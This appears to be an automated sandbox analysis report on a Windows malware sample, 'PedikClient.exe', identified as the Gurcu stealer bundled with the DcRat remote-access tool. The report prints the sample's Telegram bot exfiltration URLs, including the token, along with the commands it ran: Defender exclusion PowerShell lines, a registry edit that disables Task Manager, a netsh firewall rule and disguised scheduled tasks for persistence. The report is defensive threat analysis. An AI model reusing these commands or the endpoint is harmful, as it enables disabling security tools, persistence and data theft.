Resubmissions

23-10-2024 02:31

241023-czs5ssydnj 10

23-10-2024 02:28

241023-cygelsxakf 10

Analysis

  • max time kernel
    600s
  • max time network
    600s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    23-10-2024 02:28

General

  • Target

    PedikClient.exe

  • Size

    1.7MB

  • MD5

    28d6347c722e5cac5ae9245b16d4754c

  • SHA1

    45a79b7368ec79516ab1772188bec1b36c43d498

  • SHA256

    eb0e511e7656cf46b8632c82afd2c54fc28ca897fc852229839d67e9a23700e1

  • SHA512

    643465e266e0bd5b2659d68bd3752cd53c88be29f3fe1805523196c1b3720279e34919f4a6d53c1e3a867f3b1d5c38c4abb8c7d68cce13cc11e62de911aac181

  • SSDEEP

    49152:MfZ8c3XIwfnWpiDwDFyeEPk3Oy89y1iRW4SEXtTd15:MhVXIwfIdceEPk3O/y1iRW4SutJ15

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7836713809:AAFVjVgs5X6tBgtn8kQYnLmDb16xmnacHfg/sendPhoto?chat_id=7706607495&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%2054fc3e5a6b55272eba6a6924abad84753916e711%0A%E2%80%A2%20Comment%3A%20Arbuzik%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20RPHBTALT%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20138.199.29.44%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CProgram%20Files%20(x86)%5CGoogle%5Cdwm.ex

https://api.telegram.org/bot7836713809:AAFVjVgs5X6tBgtn8kQYnLmDb16xmnacHfg/sendDocument?chat_id=7706607495&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID%3A%2054fc3e5a6b55272eba6a6924abad84753916e711%0A%0A%E2%80%A2%20Scanned%20Directories%3A%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A01.371713

Signatures

  • DcRat 11 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Modifies WinLogon for persistence 2 TTPs 7 IoCs
  • Process spawned unexpected child process 19 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • UAC bypass 3 TTPs 6 IoCs
  • DCRat payload 3 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Disables Task Manager via registry modification
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 4 IoCs
  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 9 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 58 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 7 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies registry class 45 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 9 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 6 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\PedikClient.exe
    "C:\Users\Admin\AppData\Local\Temp\PedikClient.exe"
    1⤵
    • DcRat
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3888
    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Injector.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Injector.exe"
      2⤵
      • DcRat
      • Executes dropped EXE
      • Drops file in System32 directory
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1188
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Windows\System32\Pj3sASAQmYbZO22AgnND3YNrHBGc.vbe"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4540
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Windows\System32\7laDcN0rCRiiFFEryGzr87P90jYlcM.bat" "
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2552
          • C:\Windows\SysWOW64\SystemUpdates.exe
            "C:\Windows\System32\SystemUpdates.exe"
            5⤵
            • Modifies WinLogon for persistence
            • UAC bypass
            • Executes dropped EXE
            • Adds Run key to start application
            • Checks whether UAC is enabled
            • Drops file in Program Files directory
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            • System policy modification
            PID:4100
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of AdjustPrivilegeToken
              PID:4836
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of AdjustPrivilegeToken
              PID:4892
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of AdjustPrivilegeToken
              PID:4480
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of AdjustPrivilegeToken
              PID:4668
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of AdjustPrivilegeToken
              PID:4060
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of AdjustPrivilegeToken
              PID:4848
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of AdjustPrivilegeToken
              PID:1808
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of AdjustPrivilegeToken
              PID:3340
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of AdjustPrivilegeToken
              PID:4736
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of AdjustPrivilegeToken
              PID:1668
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of AdjustPrivilegeToken
              PID:4928
            • C:\Program Files (x86)\Google\dwm.exe
              "C:\Program Files (x86)\Google\dwm.exe"
              6⤵
              • Modifies WinLogon for persistence
              • UAC bypass
              • Executes dropped EXE
              • Checks whether UAC is enabled
              • Modifies registry class
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              • System policy modification
              PID:4320
              • C:\Windows\System32\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\da189635-e194-4091-ac06-732c716850a2.vbs"
                7⤵
                  PID:2472
                • C:\Windows\System32\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bfb84b27-316d-47b6-a319-30e6d6186c3e.vbs"
                  7⤵
                    PID:1328
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://localhost:12587/
                    7⤵
                    • Enumerates system info in registry
                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    • Suspicious use of WriteProcessMemory
                    PID:4732
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffbd2a83cb8,0x7ffbd2a83cc8,0x7ffbd2a83cd8
                      8⤵
                      • Checks processor information in registry
                      • Enumerates system info in registry
                      PID:1388
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2060 /prefetch:2
                      8⤵
                        PID:1992
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2108 /prefetch:3
                        8⤵
                          PID:3860
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2592 /prefetch:8
                          8⤵
                            PID:4108
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
                            8⤵
                              PID:1900
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
                              8⤵
                                PID:3076
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3888 /prefetch:1
                                8⤵
                                  PID:2832
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5028 /prefetch:1
                                  8⤵
                                    PID:3088
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3528 /prefetch:8
                                    8⤵
                                      PID:1452
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3912 /prefetch:1
                                      8⤵
                                        PID:1640
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:1
                                        8⤵
                                          PID:4040
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1
                                          8⤵
                                            PID:432
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6004 /prefetch:8
                                            8⤵
                                              PID:712
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4884 /prefetch:1
                                              8⤵
                                                PID:2832
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6012 /prefetch:1
                                                8⤵
                                                  PID:4348
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:1
                                                  8⤵
                                                    PID:1532
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qzqLwOyuSO.bat" "
                                                  7⤵
                                                    PID:2448
                                                    • C:\Windows\System32\w32tm.exe
                                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                      8⤵
                                                        PID:3864
                                                • C:\Windows\SysWOW64\reg.exe
                                                  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                  5⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Modifies registry key
                                                  PID:1048
                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\ExInjector.exe
                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\ExInjector.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Drops file in System32 directory
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious behavior: GetForegroundWindowSpam
                                            • Suspicious use of AdjustPrivilegeToken
                                            • Suspicious use of WriteProcessMemory
                                            PID:4976
                                            • C:\Windows\SysWOW64\netsh.exe
                                              netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\RarSFX0\ExInjector.exe" "ExInjector.exe" ENABLE
                                              3⤵
                                              • Modifies Windows Firewall
                                              • Event Triggered Execution: Netsh Helper DLL
                                              • System Location Discovery: System Language Discovery
                                              PID:2872
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 6 /tr "'C:\Users\Default\SendTo\sysmon.exe'" /f
                                          1⤵
                                          • DcRat
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:1328
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Users\Default\SendTo\sysmon.exe'" /rl HIGHEST /f
                                          1⤵
                                          • DcRat
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:1696
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 12 /tr "'C:\Users\Default\SendTo\sysmon.exe'" /rl HIGHEST /f
                                          1⤵
                                          • DcRat
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2804
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Program Files\Uninstall Information\dllhost.exe'" /f
                                          1⤵
                                          • DcRat
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:1864
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\dllhost.exe'" /rl HIGHEST /f
                                          1⤵
                                          • DcRat
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:4220
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Program Files\Uninstall Information\dllhost.exe'" /rl HIGHEST /f
                                          1⤵
                                          • DcRat
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2120
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Google\dwm.exe'" /f
                                          1⤵
                                          • DcRat
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:4400
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\dwm.exe'" /rl HIGHEST /f
                                          1⤵
                                          • DcRat
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:5028
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Google\dwm.exe'" /rl HIGHEST /f
                                          1⤵
                                          • DcRat
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:4796
                                        • C:\Windows\system32\vssvc.exe
                                          C:\Windows\system32\vssvc.exe
                                          1⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4604
                                        • C:\Windows\System32\CompPkgSrv.exe
                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                          1⤵
                                            PID:4488
                                          • C:\Windows\System32\CompPkgSrv.exe
                                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                                            1⤵
                                              PID:2780
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /delete /tn "SystemUpdates" /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              PID:3892
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /delete /tn "SystemUpdatesS" /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              PID:3620
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /delete /tn "sysmon" /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              PID:3800
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /delete /tn "sysmons" /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              PID:2904
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /delete /tn "dllhost" /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              PID:3408
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /delete /tn "dllhostd" /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              PID:3032
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /delete /tn "dwm" /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              PID:964
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /delete /tn "dwmd" /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              PID:712
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /delete /tn "dwm" /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              PID:236
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /delete /tn "dwmd" /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              PID:2988
                                            • C:\Windows\system32\sihost.exe
                                              sihost.exe
                                              1⤵
                                              • Suspicious use of FindShellTrayWindow
                                              PID:2820
                                              • C:\Windows\explorer.exe
                                                explorer.exe /LOADSAVEDWINDOWS
                                                2⤵
                                                • Boot or Logon Autostart Execution: Active Setup
                                                • Enumerates connected drives
                                                • Checks SCSI registry key(s)
                                                • Modifies registry class
                                                • Suspicious behavior: GetForegroundWindowSpam
                                                • Suspicious use of FindShellTrayWindow
                                                • Suspicious use of SendNotifyMessage
                                                • Suspicious use of SetWindowsHookEx
                                                PID:2804
                                            • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
                                              "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
                                              1⤵
                                              • Enumerates system info in registry
                                              • Modifies Internet Explorer settings
                                              • Modifies registry class
                                              • Suspicious use of SetWindowsHookEx
                                              PID:1032
                                            • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                              "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                              1⤵
                                              • Modifies registry class
                                              • Suspicious use of SetWindowsHookEx
                                              PID:1392

                                            Network

                                            MITRE ATT&CK Enterprise v15

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads

                                            • C:\Program Files (x86)\Google\6cb0b6c459d5d3

                                              Filesize

                                              132B

                                              MD5

                                              58e74fa818e8cce8e80ecc9f8cbcc8a1

                                              SHA1

                                              58abd252b2c7b3c234cd96582a40802c0b51788d

                                              SHA256

                                              e53b0946ac004e41be07cc97c4b74983c0667eeb3b89aa5527fbda4d44c0b3d1

                                              SHA512

                                              9c42c26126f4ada357719cf84a65eefbaa5873a86e19a8c424191cc289c6e130c28bc6df467cd71bf95dd2343425e272d6c9aee7b84b98181a46594763972688

                                            • C:\Program Files\Uninstall Information\5940a34987c991

                                              Filesize

                                              543B

                                              MD5

                                              edaed1f15b355d1b50911e6d6b199b42

                                              SHA1

                                              02462609bf5fd94a96c7dc0d091452368f3e7f04

                                              SHA256

                                              edf4f199b51b187222a11a143c024ee3998c400701a996dddf38ec58797c8acc

                                              SHA512

                                              4ce6811952bf1a02d5128a0804135b469528e6dd3cde63b65f0492439f7ce1a3d9117a56355b70a0d7910705d01d0e3f7f71b1e6c71a38ee07cec0b4c6c321d1

                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                              Filesize

                                              2KB

                                              MD5

                                              627073ee3ca9676911bee35548eff2b8

                                              SHA1

                                              4c4b68c65e2cab9864b51167d710aa29ebdcff2e

                                              SHA256

                                              85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

                                              SHA512

                                              3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

                                              Filesize

                                              150B

                                              MD5

                                              b3f2fca43760ecfa68917ee4110865c1

                                              SHA1

                                              6169d73829d4bc888cecf8b06fe69448b5df4248

                                              SHA256

                                              f4ed8df53b8da23cd20866bf55091ac35c644b5bf4658014ea580a23fd6edada

                                              SHA512

                                              ae247c75cd004bf65b7c5a596bbd95b7c5c356b60b79a5459b47e0f22a7a10670dce631066dd8633e0493296801398d1d9017d600d8750e2ffc7a9942f25ab55

                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\3719a391-eb94-4fb1-bb2f-1d363930f98c.dmp

                                              Filesize

                                              3.5MB

                                              MD5

                                              1321b068780c65c700dacb690f64b7b7

                                              SHA1

                                              f31baf7d77520f0807076c5709333888b2ae6f6e

                                              SHA256

                                              13a3deeb3c597ad6a69d8b5eb27d7560ae33411285623a6b38975ecd03af8f7e

                                              SHA512

                                              7076331cc3952570a90c6ffd9967ecbc56bc94e26caa77520a717bf54a9665501b39a2a109873e7f81fc7ca2ef024099a9d290fa32af7e29abeb0792d3505960

